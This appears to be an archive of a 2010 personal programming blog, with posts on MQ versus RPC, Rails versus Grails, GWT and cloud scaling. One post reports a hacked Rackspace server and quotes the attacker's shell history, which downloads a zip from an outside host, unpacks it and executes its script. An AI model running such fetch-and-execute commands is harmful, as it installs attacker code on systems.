Tuesday, December 28, 2010

Making the MQ versus RPC decision

Among many software architects and pundits, Message Queue solutions get a lot of press for being highly scalable in comparison with RPC-based solutions. From what I can see, the biggest problem with most comparisons is that they start with the premise that one or the other of these two approaches is superior and then spend their time trying to make a compelling argument for why they are correct.

I'm going to throw my hat in the ring on this issue and offer a high level guide for folks who don't have the time or energy to dig into queuing theory or debate with ivory tower architects about the issue. You'll note that scalability is not even a factor. This is deliberate, as scalable and performant solutions can be built using either pattern. There is an interesting performance comparison that seems to indicate that the performance characteristics are very similar for both approaches. I WILL point out that simple http-based RPC solutions DO have fewer middleware requirements and are almost universally accessible. Furthermore, I'll point out that it is entirely possible that a real world solution may need both.

In any event, some strong indicators you'll likely need an MQ based solution include:
  • I need multiple endpoints to subscribe to my message
  • I need durable messages that can be delivered even when the message destination is not running

From my perspective, if any of these are necessary, then some sort of MQ technology is probably appropriate. Certainly, if you try to build a custom solution to either of those problems, you're highly likely to be wasting your time.

On the other hand, some equally strong indicators that an RPC solution is probably your best choice:
  • I need clients to get an answer immediately
  • I need a very small footprint and performance and simplicity are more important than reliability

The first bullet above is the most important: synchronous message queuing patterns (e.g. request/response over a queue) typically come with a lot of baggage that may be hurting both your performance AND your scalability.
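
To make the contrast concrete, here's a minimal java sketch of the two styles side by side (a sketch only: the JNDI names and URL are made-up placeholders, JMS 1.1 on the queue side, plain http on the RPC side):

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import javax.jms.Connection;
import javax.jms.ConnectionFactory;
import javax.jms.DeliveryMode;
import javax.jms.MessageProducer;
import javax.jms.Session;
import javax.jms.Topic;
import javax.naming.InitialContext;

public class MqVersusRpc {

    // MQ style: publish a persistent message to a topic. Any number of
    // subscribers can consume it, including ones that are down right now.
    public void publishOrderEvent(String orderXml) throws Exception {
        InitialContext ctx = new InitialContext();
        ConnectionFactory cf = (ConnectionFactory) ctx.lookup("ConnectionFactory"); // placeholder JNDI name
        Connection conn = cf.createConnection();
        try {
            Session session = conn.createSession(false, Session.AUTO_ACKNOWLEDGE);
            Topic topic = (Topic) ctx.lookup("topic/orders"); // placeholder destination
            MessageProducer producer = session.createProducer(topic);
            producer.setDeliveryMode(DeliveryMode.PERSISTENT); // message survives a broker restart
            producer.send(session.createTextMessage(orderXml)); // fire and forget, no answer expected
        } finally {
            conn.close();
        }
    }

    // RPC style: one endpoint, an immediate answer, no middleware beyond http.
    public String getOrderStatus(String orderId) throws Exception {
        URL url = new URL("http://example.com/orders/" + orderId + "/status"); // placeholder URL
        HttpURLConnection http = (HttpURLConnection) url.openConnection();
        BufferedReader in = new BufferedReader(new InputStreamReader(http.getInputStream()));
        try {
            return in.readLine(); // caller blocks right here and gets its answer immediately
        } finally {
            in.close();
        }
    }
}

The publish returns as soon as the broker takes the message; the http call doesn't return until it has an answer. That single difference drives most of the indicators above.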

I've worked with a variety of solutions using MQSeries, JMS providers, and BizTalk, used both appropriately and otherwise. In every case I can remember, if we had used the above guide, we would have had a better chance of picking the most appropriate solution and would have arrived at the conclusion more quickly.

Sunday, December 26, 2010

My experience at Denny's and three rules for success

I recently went out to breakfast with my family at our local Denny's restaurant. We arrived around 9:15am and there was a pretty "interesting" line of folks waiting to be seated. In retrospect this should have been an indicator that something was wrong and things were going to be slow.

We finally got seated and our server promptly brought menus and took our order, then we settled down and began waiting for our food. While waiting at our table, at least 6 other groups came in after us, were seated, ordered, got their food, and left.

After about 30 minutes, the greeter actively started telling people that the food was going to take 30 to 90 minutes to prepare and people stopped being seated. In addition, while the greeter was saying this to new customers, our server kept telling us the food would be out "in just a little bit". By 11:00am, I was pretty irritated because our breakfast had turned into lunch and all the other places to eat in the area were now open (note, Denny's was NOT our first choice).

Finally our food arrived, we ate, and I had the dubious honor of talking to the manager about what went wrong. It turns out they only had one cook... normally this is a problem, but then they had a bunch of people show up, everyone panicked, and things went downhill fast. In effect, the entire attitude was that "it's not our fault"... unfortunately, I didn't really care whose fault it was or wasn't, I cared that I sat around for 1.5 hours waiting for some food I could have prepared myself in about 30 minutes.

This brings me to my three rules:

#1 When things get out of hand, tell your customers immediately. They are NOT going to be happier if you make them wait longer wondering what the heck is going on. Notice I didn't say "if". That's deliberate, I know "stuff" happens, reasonable people will get it.
#2 When things seem to be getting out of hand, adding another cook might not help. What seems to have happened in our case is that a few other employees tried to help the cook and screwed things up. Everyone started getting irritated, arguments started, and things started to spiral out of control.
#3 Treat your EXISTING customers as well as or better than new ones. If they had approached me 30 minutes into the debacle and said "we're running a little slow, are you sure you want to stay, it might be another hour" I probably would have left. Yes, I would have been upset, but not nearly as upset as after waiting for 1.5 hours (with two kids under 5, by the way). Note, wireless, satellite, cable, and other companies could learn something from this too. I'm tired of wonderful deals for "new kids" while I get substandard service because I'm already "hooked".

Wednesday, December 22, 2010

Rails, Grails, and convention over configuration

Back in 2003 I wrote a quick application generator using turbine, java, and xml, and published it to sourceforge as thrust. It is extremely primitive by today's standards, but the important point is that it embraced the "convention over configuration" concept.

I now see a lot of folks jumping into rails/grails without really thinking about what these tools mean and where they are properly applied. For example, I see folks deciding that rails/grails is the best development environment for them to build an application, then subsequently deciding to write custom code for everything. While rails/grails are still really good development frameworks no matter what, deciding to override their default behavior instead of understanding the patterns and embracing them is in many regards selling the idea short.

In my experience, many software applications are largely a similar pattern applied to itself, over and over. Rails/Grails (and thrust) are designed to exploit this and enable a dramatic speedup in development time as well as a reduction in apparent complexity. I say apparent complexity because the complexity still exists, but the framework should absorb the essential complexity (the part you cannot get rid of) and hide it from the developer in most circumstances.

Let's use an example: suppose you are writing an application with a collection of screens that allow you to edit some information in tables in a relational database. Using any of these three frameworks, you can define a template that all these screens should use and automagically generate a good starting point for most of your screens: the CRUD operations plus a listing page per entity.
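
With grails, for instance, that starting point is a couple of commands (from the grails 1.x command line; treat the specifics as a sketch):

grails create-domain-class Book
grails generate-all Book

The first creates the Book domain class; the second generates the CRUD controller and views from nothing but the conventions in that class.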

If for some reason you have no need for CRUD or a listing, or if you aren't using a database... you might be using the wrong tool for the job. That's not to say that these frameworks are not useful in this context, but you might not be getting the value that you COULD have from them.

Monday, November 29, 2010

The internet is causing the world to shrink

I was reading up on the history of communication here and had to pause at how quickly things are changing. From the invention of written communication (3500BC) until the invention of the optical semaphore (1793), instantaneous and lossless long distance communication was limited to how far you could shout/see. The rate of communication outside that range was limited to a max of about 200 miles per day (the speed of a horseback rider).

This means that for 5000 years it would take 1.5 days to send a message from Rome to Milan. Starting in 1793, this rate began to accelerate, as a visual semaphore could drop that time significantly, but it took a huge amount of infrastructure to get this working. You needed towers, telescopes, and other things to make it work.

In the space of 40 years, the electric telegraph greatly lowered the cost of long distance near light speed communication. For the remainder of the 19th century, wired telegraph and eventually wireless telegraph lowered the cost of high speed and distant communication. While the actual transport happened at or near the speed of light, the encoding cost slowed things down. Wireless telegraph was FAST, but nobody really had that in their house, so they had to walk to the telegraph office and have a specialist encode the message.

In the 20th century, the advent of in-home telephone and television enabled nearly instantaneous worldwide communication. In the 15+ years since the WWW began, the actual speed of communication has somewhat maxed out. You can't get much faster than light, and short of passing messages through the earth instead of around it, you'll have to accept a few hundred milliseconds of latency. Effectively, the entire world is living together. What would have taken days, months, or even years to communicate even 100 years ago can now happen instantaneously.

This means that the communication barriers caused by geographic dispersion are now effectively gone. If you can get an Internet connection, you are within shouting distance of the entire world.

Sunday, November 28, 2010

If IDEs Were Star Wars Characters


Rational Application Developer


Jabba the Hutt - BIG, SLOW, but also somehow powerful. You don't want to get on the wrong side of this IDE as you will be frozen in IBM consulting carbonite and NEVER get anything done.

Netbeans


Luke Skywalker - The hero who wins against all odds. However, in the software development universe, Luke actually turns to the dark side and joins Darth Vader.

Visual Studio


Emperor Palpatine - Having harnessed the dark side of the force, more powerful than you can ever imagine.

Oracle JDeveloper


Darth Vader - In the software world, after having turned Luke to the Dark side, Darth Ellison and Luke rule the Galaxy as father and son.

TextMate


Han Solo - Always seems to be there at the right time to help you out of a bind. No aspirations to rule the universe, but knows how to "get things done".

Eclipse


Battle Droids - There are millions of these, but they're all centrally controlled by someone whose motivations may be suspect. In the software development world, battle droids are actually secretly controlled by Samuel the Hutt.

Delphi

Yoda - In the software universe, much like in the Star Wars universe, he may be a powerful Jedi, but he's dead.

IntelliJ


Obi-Wan Kenobi - Strong in the force, but for some reason he lives in obscurity on a desert planet. He and Yoda live on in some mysterious way that we don't quite understand.

Notepad


An Ewok - Cute, might actually be useful, but do you seriously want to try and rule the universe as an Ewok?

Gedit


R2D2 - Very useful, behind-the-scenes kind of hero. Never going to rule the universe, but someone you certainly want to have around at all times if possible.

Flash Builder


Padme Amidala - Not sure what to say here.


Others?

This is my list so far and I realize it isn't really complete. Comment and I'll try to update with your ideas...

Saturday, November 27, 2010

Why you should purchase IntelliJ.

Aside from supporting ruby, java, groovy, flex, and about a million other things, they actually have customer service. I don't mean "faceless mindless 3 levels of useless bureaucracy" customer service, I mean "Holy crap, this guy WANTS to solve my problem" customer service.

Recently I sent JetBrains a note about an annoying, but not SUPER critical, problem. To RAD or WSAD users (or users of just about any other software package): tell me the last time you sent an email and got this sort of help from a real person.


Hello Michael,

Please define "crashes".


Serge Baranov
JetBrains, Inc
http://www.jetbrains.com
"Develop with pleasure!"

-----Original Message-----
From: "Michael Mainguy"
Sent: Tuesday, November 23, 2010, 7:29:23 PM
To: feedback@jetbrains.com
Subject: IntelliJ IDEA 'Feedback'

Product: IntelliJ IDEA
Build: IU-95.627
OS: Windows

Name: Michael Mainguy
Country: United States
TimeZone: America/Chicago
Evaluator: true

> Are you generally satisfied with IntelliJ IDEA? How do you rate the product?
Generally yes, very good

> What features appear most useful? Are there any problems?
Yes, GWT 1.4 project crashes when I try to change project structure.

> Are there any features you'd like to have but did not find in IntelliJ IDEA?
Not yet.




Note, he emailed me at 10:31 the next morning when I sent my note at 7:30 pm the night before...

So I reply to him at 12:55

By crash, I mean I get a little popup with a stack trace that I can't seem to copy. The IDE itself remains running and seems to not have any other problems.

Maybe crash is not the right word... but I'm the user so get to make vague overstatements right? ;)

If I could figure out how to get a copy of the stack trace I'd report a bug, but I'm busy fumbling along without the debugger for the time being.


I hit send, then turn to ask a coworker a question, when I turn back:


Hello Mike,

There should be blame button which will post stacktrace to us. Also
is should be possible to copy from this dialog by selecting text and
pressing ctrl+c.

Exception is also logged in
USERPROFILE\.IntelliJIdeaXX\system\log\idea.log (where XX is IDEA
version) or ~/Library/Logs/IntelliJIdea90/idea.log if you are on Mac.

Serge Baranov
JetBrains, Inc
http://www.jetbrains.com
"Develop with pleasure!"

I felt a little like Serge was the sneaky butler from Mr Deeds or, at a minimum, a Jimmy Johns delivery guy. In the next email exchange, he gave me some instructions on how to fix the problem (delete broken findbugs plugin metadata) and my issue was resolved.

The sad thing is that my expectations were so low that actual customer service is seen as "over the top". I issue an open challenge to any owner of RAD to share a similar experience with customer support from IBM for their tool that costs over 10x more than mine. I won't even engage in a debate about the features of RAD versus IntelliJ since those are pretty subjective. After all, I've only met a handful of people who ever actually enjoyed working with RAD, and most of them only used 10-15% of the "features" in the tool.

While I still use eclipse and actually like STS, IntelliJ IDEA is so much more convenient and their customer service is so spectacular that I highly recommend it for anyone doing development in the java/ruby space. Just so we're clear, here's what IntelliJ IDEA supports out of the box: Java, JavaScript, HTML/XHTML/CSS, ActionScript/Flex/AIR, XML/XSL, Ruby/JRuby, Groovy, SQL, FreeMarker/Velocity, PHP.

In addition, it supports a number of other languages with plugins.

Thursday, November 18, 2010

GWT is not a substitute for a web developer

Web development is often hampered by the fact that there are a variety of web browser rendering engines as well as a variety of javascript interpreters. This means that a developer might have to recode the same web site 4-5 times to account for all the variations. When you couple that variation with the fact that new browsers are released and developed all the time, people started to realize that there needed to be a "one stop shop" to write your code and run it anywhere.

I suppose someone at google started down the GWT path because "write once run anywhere" has been Java's watchword almost since its inception and a software holy grail since the 1970s. A basic problem with GWT is that it provides a java api for building screens, which is alien to almost all web designers and front end developers. This means that there is an additional translation from "designer" world into "developer" world.

I recently had the pleasure to muddle through some GWT code and I don't really like what I see. For folks who don't know, GWT (I love TLAs) is a tool that enables developing web front ends in pure java. This is done by running a custom compiler against java source code that outputs javascript. The cross platform capabilities get added in by generating 5 different javascript files, one for each browser platform you are targeting.
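
To give a flavor of what "a java api for building screens" looks like, here's a minimal GWT entry point (class names from the standard GWT user library, roughly the GWT 2.x vintage):

import com.google.gwt.core.client.EntryPoint;
import com.google.gwt.event.dom.client.ClickEvent;
import com.google.gwt.event.dom.client.ClickHandler;
import com.google.gwt.user.client.Window;
import com.google.gwt.user.client.ui.Button;
import com.google.gwt.user.client.ui.RootPanel;

// Plain java source. The GWT compiler cross-compiles this into per-browser
// javascript; no java runs in the browser at runtime.
public class HelloGwt implements EntryPoint {
    public void onModuleLoad() {
        Button button = new Button("Click me");
        button.addClickHandler(new ClickHandler() {
            public void onClick(ClickEvent event) {
                Window.alert("Hello from java-generated javascript");
            }
        });
        RootPanel.get().add(button);
    }
}

Notice there is no html or css in sight, which is exactly the point... and exactly the problem if your front end people think in html and css.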

Because of this, some shops appear to try to co-opt java developers and encourage them to build web front ends, and this is NOT a good idea. Does this mean a good web designer or user interaction person who knows java (or vice versa) won't be able to make great things with it? Of course not.... But it does NOT mean that a band of capable back-end java developers will suddenly be able to develop a rock star web 4.0 interactive application because "they know java" and "we're using GWT".

GWT does NOT give java developers magical design abilities, nor does it somehow make a java backend developer able to write wicked fast javascript. It DOES enable a person who understands javascript and web design as WELL as java to build cross platform applications MUCH faster than if they tried to do it themselves.

In conclusion, GWT certainly has its place in a capable software developer's toolbox as a mechanism to build screens, but as a replacement for front end developers or some sort of attempt at replacing knowledge of how browsers work, it is a pretty bad idea.

Tuesday, November 16, 2010

Architecture and Scaling Cloud Applications

OK, quickly, you've got a new app that has gone "off the charts", it's hosted on EC2 and you want to be able to scale in order to meet demand.

What do you do?

While this is a great situation, too often the answer technical people come up with is either:
#1 (customer answer) We need to get someone else to build this for us, our IT guys don't know what they're doing.
#2a (developer answer) Rewrite the app in (erlang, scala, ruby, java, C#) because our code sucks and isn't scalable
#2b (developer answer) Switch to (Oracle, DB2, MySql, MongoDB, Terracotta, Spring, EJB3) because (Oracle, DB2, MySql, MongoDB, Terracotta, Spring, EJB3) doesn't scale well
#3a (infrastructure answer) We need to buy more EC2 instances and "scale out"
#3b (infrastructure answer) We need to bring it in-house and we'll get the biggest baddest server you can buy
#4 (architect answer) Where's the bottleneck?

OK, I know #4 isn't really an answer, but it illustrates the problem. The architect's job is to fully understand the problem and help guide discussion about what possible solutions are. I've met a lot of architects and usually can tell what their background is after a discussion like this. The well rounded folks will typically ask a lot of questions before jumping to a conclusion about the best answer. The folks who grew up in the business will choose #1, Developers #2, Infrastructure #3, and rarely you'll get a #4.

That having been said, the best answer is probably to get ahead of the problem and build scalability into your design. For dynamic web applications this means you should adopt the following positions:

#1 My application might be hosted on a laptop with an in memory database, or it might be hosted on 52 app servers with 12 database instances - my design shouldn't require large changes to accommodate either.
#2 My URL scheme matters (even down to DNS) and should reflect unique identities of the resources my application deals with (see REST) AND use proper http verbs where applicable (see the example after this list).
#3 Don't panic
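
To illustrate #2, a resource-oriented URL scheme with proper verbs might look something like this (hypothetical host and ids):

GET    http://api.example.com/products/12345          (fetch one product)
GET    http://api.example.com/products?category=27    (filter the collection)
PUT    http://api.example.com/products/12345          (replace that product)
DELETE http://api.example.com/products/12345          (remove it)

Because each resource has a stable, unique URL, any layer from DNS on down can route, cache, or shard requests without your application code changing.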

So what does this really mean?

For one, the days when writing a J2EE app and/or SOAP service was the best way to do things are past. While J2EE can scale up easily and theoretically even scale out, it's just too dang expensive and difficult to get that to work well (unless you like throwing money at problems). Why?

First off, most J2EE containers (and applications) are designed around the idea that you have a big chunk of shared memory and multiple processors available. As an example, many of the shared resources rely on thread pooling. This has some serious drawbacks when you start getting into extremely high load. All those thread pools need overhead to manage each other's state and that management affects your entire application as all those CPUs start to melt down doing thread management activities.

Second, SOAP is basically a more web centric, platform independent replacement for CORBA... Because of its design, it requires a bit more work than simple URL parsing to be able to scale it. Add to this the problem of xml marshalling and you'll quickly devolve into a big mess of performance and scalability problems.

These problems aren't the only ones, nor are they limited to J2EE and web services (.Net suffers from similar problems), but they are indicative of a bigger problem brewing in web application development and architecture. To get ahead of this, start thinking about what is REALLY NECESSARY to run your application. It may be surprising how much extra "stuff" you've added in "just in case" that is not only hampering development tempo, but also potentially slowing you down at runtime.

Tuesday, November 9, 2010

Just enough math to be dangerous



Next time you find yourself in a pointless argument with someone who "knows" statistics, remember the bottom statistic.

On the flipside, it took me at least 30 minutes of watching videos and reading explanations to figure out how it could even be possible to propel something directly downwind, faster than the wind, propelled only by the wind.

Wednesday, November 3, 2010

Cloudant couchdb is free

I've been investigating methods of storing content online and ran across an interesting offering from cloudant. They offer a 2gb couchdb database for free. For folks who don't know, couchdb is a json/RESTful distributed document database. If you're trying to manage online content for a web application it has some interesting advantages over the competition.

The most interesting advantages to me are:
  • Native RESTful javascript/JSON API. The database itself uses http as the communication protocol (see the sketch after this list)
  • Inherent MVCC support. This means old versions of a document live on after they've been updated
  • Built-in searching and materialized views. I can define some metadata about my content and instantly retrieve it
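
To show what "the database itself uses http" means, here's a minimal java sketch that writes and then reads a document (the host, database name, and document id are all made up; 5984 is couchdb's default port):

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class CouchSketch {
    public static void main(String[] args) throws Exception {
        // Create (or replace) a document with an http PUT of raw JSON.
        URL doc = new URL("http://localhost:5984/content/article-42"); // hypothetical db and doc id
        HttpURLConnection put = (HttpURLConnection) doc.openConnection();
        put.setRequestMethod("PUT");
        put.setDoOutput(true);
        OutputStream out = put.getOutputStream();
        out.write("{\"title\":\"hello\",\"body\":\"world\"}".getBytes("UTF-8"));
        out.close();
        System.out.println("PUT status: " + put.getResponseCode());

        // Read it back with a plain GET; the response body is JSON.
        HttpURLConnection get = (HttpURLConnection) doc.openConnection();
        BufferedReader in = new BufferedReader(new InputStreamReader(get.getInputStream(), "UTF-8"));
        for (String line; (line = in.readLine()) != null;) {
            System.out.println(line);
        }
        in.close();
    }
}

No driver, no binary wire protocol; just http verbs and JSON bodies.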

Some of the competition in this case would be Amazon S3 and MongoHQ. While it turns out that both have free offerings, the online console at cloudant is the most user-friendly (as of this second).

Wednesday, October 27, 2010

Rails and grails package management

Next on my agenda for comparing these two frameworks is package (aka dependency) management. Up until the release of Rails3, I would say grails was the hands down clear cut winner in this regard. Grails was engineered from VERY early on with the idea of dependency management being core to the framework. IMHO, this further illustrates how grails advanced the state of the art by sanding some of the rough edges off of rails. If I were in charge of an IT department, I still think grails has a bit of an edge from a management perspective, but it does lose out a little in the flexibility department.

Ruby (via the gem mechanism) still suffers greatly from "gem hell" problems. Rails3 takes a step in the right direction by making bundler a core part of how applications are configured. Grails, on the other hand, is moving toward using maven as its standard dependency management solution; it has supported this for a number of years now and it works pretty well.

Where grails and maven suffer is that they are VERY opinionated. Unless you embed a jar directly in your project, it is very difficult to deviate from the "maven" way of packaging things. This means that building off a dev/snapshot package can be problematic (especially if you need to switch repositories often). Rails/Bundler on the other hand, while still pretty opinionated, lets you pick the method you want to pull your dependencies in. You can pull individual gems from git, some stuff from github, some stuff off your local machine. By embracing the culture of "everyone pitch in" they are offering the most flexible possible solution.

On the other hand, asking 3 people how to properly include a library in a rails project will likely net you 4-5 different answers. Grails, by contrast, will likely only get 2 answers...

Which of these two methods is better is left to you... I prefer the flexible approach of rails when developing software, but the more controlled mechanism of grails when maintaining software and infrastructure.

Tuesday, October 26, 2010

Rails and grails job scheduling

In my continuing comparison of ruby on rails to groovy and grails I've discovered another big difference. Grails has excellent support for job scheduling, whereas the existing rails plugins are confusingly complicated.

In grails, to set up a job, install the quartz plugin

grails install-plugin quartz
grails create-job MyJob

and edit the new class called MyJob

class MyJob {
    static triggers = {
        simple name: 'mySimpleTrigger', startDelay: 60000, repeatInterval: 1000
    }

    def group = "MyGroup"

    def execute() {
        print "Job run!"
    }
}


Done, you now have a job running inside your application at a repeating interval. The plugin supports cron-like syntax as well as custom triggers.
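
Under the covers this is just the quartz scheduler. For comparison, the rough equivalent in plain java against the quartz 1.x API (which is what the plugin wrapped at the time; treat the details as a sketch):

import org.quartz.CronTrigger;
import org.quartz.JobDetail;
import org.quartz.JobExecutionContext;
import org.quartz.Scheduler;
import org.quartz.impl.StdSchedulerFactory;

public class SchedulerBootstrap {

    // The job itself is just a class implementing org.quartz.Job.
    public static class MyJob implements org.quartz.Job {
        public void execute(JobExecutionContext context) {
            System.out.print("Job run!");
        }
    }

    public static void main(String[] args) throws Exception {
        Scheduler scheduler = new StdSchedulerFactory().getScheduler();
        JobDetail job = new JobDetail("myJob", "MyGroup", MyJob.class);
        // Fire at the top of every minute (quartz cron syntax).
        CronTrigger trigger = new CronTrigger("myTrigger", "MyGroup", "0 * * * * ?");
        scheduler.scheduleJob(job, trigger);
        scheduler.start(); // runs in-process on quartz's own thread pool
    }
}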

Rails, on the other hand (much like perl ;) has more than one way to do it. The biggest thing I notice is that most of the rails plugins either #1 require you to schedule a unix cron job (example) or #2 require you to run another ruby process to do the scheduling (example). The fundamental difference is that the "ruby way" is to create a new process manually instead of forking a process or new thread in the initialization of your application (like the java/grails way).

Some other ways to do it from the rails wiki.

In short, background job scheduling is something that grails took a completely different approach with. By leveraging the quartz library and embracing all the multithreaded goodness that is a modern J2EE container, grails makes a compelling case for "this is the way you do it". Rails, on the other hand, for all its "convention over configuration" talk, has a rat's nest of confusing methods to accomplish a fairly routine and simple task.

The fundamental problem with this sort of activity in rails is that the underlying architecture isn't designed around the concept of a long running process that services multiple simultaneous activities. In my head, this is a pretty important consideration when you start thinking about managing more than a simple CRUD application. The rails way is to essentially ignore this and let folks run amok building random plugins. The grails way is to treat this as a fundamental (though optional) part of building web applications.

Monday, October 25, 2010

Technology and programming trends

As a technologist, I'm always keeping my eyes on the market. There's nothing worse from a marketability perspective than being the best chariot wheel repairman when the entire world has moved on to automobiles. If you're going to be in a niche, you'd better be in one that is HIGHLY lucrative.

To this end, I took a look on indeed.com and tried to see how various programming languages stacked up as far as job postings.


Obviously this is not comprehensive, but it shows what I "kinda" already knew. C is king, with java taking a large secondary position and C# following up behind java. One thing to note is that the largest percentage shown on that chart is 4%. This roughly means that the market is SO fragmented that a large leader only captures 4%. For the COBOL folks clinging on for dear life... hopefully you're near retirement age, because right now finding a COBOL job is going to be pretty difficult.

Now for a more interesting perspective. Let's rescale everything relative to its position a few years ago and plot the numbers as percentage growth.


Whoa! This paints an interesting picture. We see that a few new upstarts (erlang, ruby, and groovy) are taking off. Furthermore, we see that of those 3, ruby actually scores higher in absolute market than a lot of established players.

These charts, however, only show part of the picture. Right now, mobile, social media, and cloud technologies are just as important as skill in any particular programming language. In fact, the value of twitter (for example) is not really from the languages used (scala, ruby), but from the social effect gained by using the technology.

For the next group, I eliminated C just because it was so much higher than everything else, but also because a lot of C positions are for things that aren't really trending upward. So now let's look at a few "hot" technologies scored against some programming languages.


We can see that the mobile/cloud/social space seems to not have broken too far into the market yet. However, when we look at growth...


We see that twitter (holy smokes), facebook, and iPhone are all growing exponentially upward. Now part of this is because they haven't been around very long, but take away the leaders and REALLY look at the numbers.

We can see that, while the market is still relatively small, it is fairly large at .6% (or roughly 1/6th that of the leader... C), and that coupled with large growth indicates to me that it might be a good place to be. Note, I added sharepoint to the second slide because I keep seeing postings for it and it DOES seem to have a nice position... Its growth, however, is linear, and I'm more interested in the rate of increase of the growth for the time being.

I realize this isn't a highly scientific study and there are a ton of holes in the analysis, but the point is that things are starting to break free of the traditional "I'm a java guy" perspective and trending toward technologies that require integration. In addition, given how small a market share the leading language has, there is a compelling case to be made for being a polyglot.

Thursday, October 21, 2010

Hacked Server on Rackspace

Last month, I had a cloud server exploited and couldn't figure out how it happened. After a little investigation, I've got a good news bad news situation. The good news is that I DID manage to contact someone at rackspace who could help me out and they re-enabled my account.

The bad news is that the server wasn't pretty. On the upside, it must have been hacked by a script kiddie, as they did NOT cover their tracks very well at all. On the downside, they did NOT appear to have used the single user account I created and somehow entered through either the rackspace admin network (SPOOKY, inside job?) or one of the default services installed with Ubuntu 10.04 LTS (still not good).

From my root .bash_history, I noticed the following (the first few lines may have been me):
exit w
w
passwd
cd /var/tmp
la
wget hacker.go.ro/go.zip
unzip go.zip
cd go
chmod +x *
./go.sh 112
cd /var/tmp
cd go
chmod +x *
./go.sh 220

In my /var/tmp/go directory I have a bunch of stuff that I'm looking at right now, but of specific interest are a couple of Chinese servers that appear to have been used in the heist.

In short, Rackspace did a good job during "normal business" hours of helping me out, but I certainly ran into a few pretty serious drawbacks. Notably:

#1 By default, servers are built and exposed to the internet immediately.
#2 There is no mechanism to set up mini DMZs or other ways to cordon off traffic, except through software controls (on servers that are already potentially p0wn3d).
#3 There is no weekend support as far as I can tell.

A big plus to having the server physically sitting on site is that, unless you get locked out of the server room, you can ALMOST always reboot the server from a CD and reinstall the OS. If your hosting provider decides to disable your cloud network console, you're kinda out of luck.

Overloaded terms in the Ruby community

I've been refactoring some tests and changed them from using a global set of users/roles defined as fixtures to instead be factories.

OK, for java folks I'm going to give you the secret ruby decoder ring.

Fixtures = predefined data that you create by manually seeding via seed.rb
Factories = data generated via a factory method at runtime
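
In java/JUnit terms, the distinction maps roughly to this (a made-up example purely to translate the vocabulary):

import static org.junit.Assert.assertTrue;
import org.junit.Before;
import org.junit.Test;

public class AccountTest {

    // Tiny stand-in domain class so the example is self-contained.
    static class User {
        final String name;
        final String role;
        boolean locked;
        User(String name, String role) { this.name = name; this.role = role; }
    }

    private User admin;

    // "Fixture" flavor: shared, predefined data set up before every test.
    @Before
    public void seedData() {
        admin = new User("admin", "ADMIN_ROLE");
    }

    @Test
    public void adminsHaveAdminRole() {
        assertTrue(admin.role.equals("ADMIN_ROLE"));
    }

    // "Factory" flavor: the test builds exactly the data it needs, right
    // where it needs it, via a factory method.
    @Test
    public void lockedUsersAreLocked() {
        User bob = createUser("bob", "USER_ROLE", true);
        assertTrue(bob.locked);
    }

    private User createUser(String name, String role, boolean locked) {
        User u = new User(name, role);
        u.locked = locked;
        return u;
    }
}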

It's interesting that the ruby community has decided to overload the meaning of these terms to be very specific. I say this because in the "rest of the world" when dealing with testing, a test fixture is a much more generic concept. Typically it is the thing that sets up the test and tears down the test. Yes, often it creates data, but that is not necessarily its job.

Factories = This is a term that alludes to a well known and fundamental design pattern that can be used for a million different things and honestly has fallen out of vogue with java folks in favor of using dependency injection instead. It seems many folks think that using a factory to generate data for a test case has some inherent advantage over using pre-seeded global data (or other patterns). The primary advantage stated is that it moves the generation of the data closer to the thing being tested.

This is a very good reason, but it doesn't actually eliminate fixtures (generally speaking), it simply moves the fixture from a global scope into a more specific scope. The obvious downside to this is that for things that recur in multiple scopes, you are now repeating yourself.

Wednesday, October 20, 2010

Ruby on rails and groovy grails comparison

As a person who has had the luxury to work in both ruby on rails and groovy grails, I've found a few differences that make their approach quite a bit different.

#1 Groovy allows you to write java. While this isn't a huge deal, it can be both a positive and a negative. I've worked on teams where folks treat grails as a super simple java framework and never leverage any of groovy's dynamic goodness. While this isn't a huge problem, it does delay (or eliminate) the transition from J2EE xml configuration file hell into a more dynamic way of coding.

#2 Ruby forces you to learn "the ruby way". For folks who are only used to java, seeing ruby code is like... seeing another language. Because of this, the idioms used in java are more quickly forgotten and you more quickly become a ruby native because you MUST. Having only worked with a few other people while they moved from java to ruby, I can only speak from my personal experience. I can say that ruby's syntax is not THAT much different as long as you keep an open mind, and I found I was able to learn the "ruby way" more quickly than I was able to learn the "groovy way" simply because I was FORCED to with ruby.

#3 Rails uses db migrations by default. This is a huge plus for db CRUD applications. It enables you to make sure you have a migration path from version to version of your code. Grails, on the other hand, doesn't come with anything (by default) to handle this.

#4 Rails has a sparse model class definition. Should you NOT decide to use db migrations, you can simply create some tables in your database, create an empty ruby class, and begin using it. You don't need a class definition that matches the db table, because the fields are put on the class via introspection of the table. This then frees you to only implement business functionality on your model.

#5 Grails integrates seamlessly with most modern J2EE environments. Newer versions of spring allow you to code groovy code INSIDE your spring configuration xml. Grails creates a war file that can be deployed with little or no modification directly into a J2EE container. Rails CAN be integrated in a similar fashion, but it is really a kind of frankenstein implementation to get JRuby on rails via a J2EE container.

#6 Ruby on rails is MUCH more nimble and dynamic for building functionality. Grails enables taglibs and meta-programming, but many of the DSLs quickly get cluttered with java-like confusion that doesn't really have any business advantage. In addition, because of the way grails works with classloading in servlet containers, it is constantly restarting the container to pick up new functionality. With rails, I can reinitialize the database, drop/create tables, completely redesign the application, and it will typically continue to run without a hitch. I've often gone an entire day adding/removing domain classes, changing controllers, and rebuilding tag libraries, and my rails engine never has to be restarted.

#7 The groovy and grails community is more organized. That having been said, they're both pretty disorganized and certainly the "herd of cats" syndrome is running rampant in both of them. However, when I google "groovy roadmap", my first hit is http://groovy.codehaus.org/Roadmap, while "ruby roadmap" gets me http://redmine.ruby-lang.org/projects/ruby-19/roadmap. You choose which one seems more organized.

#8 The ruby community is larger. While still pretty small compared to the likes of PHP or java, you can't throw a stick without hitting someone who has at least heard of ruby on rails. Groovy/Grails is still pretty small. On the other hand, I would point out that the grails community is growing where the rails community growth seems to have leveled off in the last year or so.

In conclusion, there are a lot of other factors that make selection of one or the other of these better or worse. If I were to learn only one of these and had no prior experience, I would probably learn ruby and rails just because of the size of the community. If I were a java person, I would likely start with groovy/grails just because the learning curve is going to be less steep.

Friday, October 8, 2010

jQuery ajax performance tuning

Modern web applications are all about user experience and a major factor in this is performance. A user interface that is laggy or gives the appearance of slowness will drive users away as quickly, if not more quickly, than an ugly and unintuitive one.

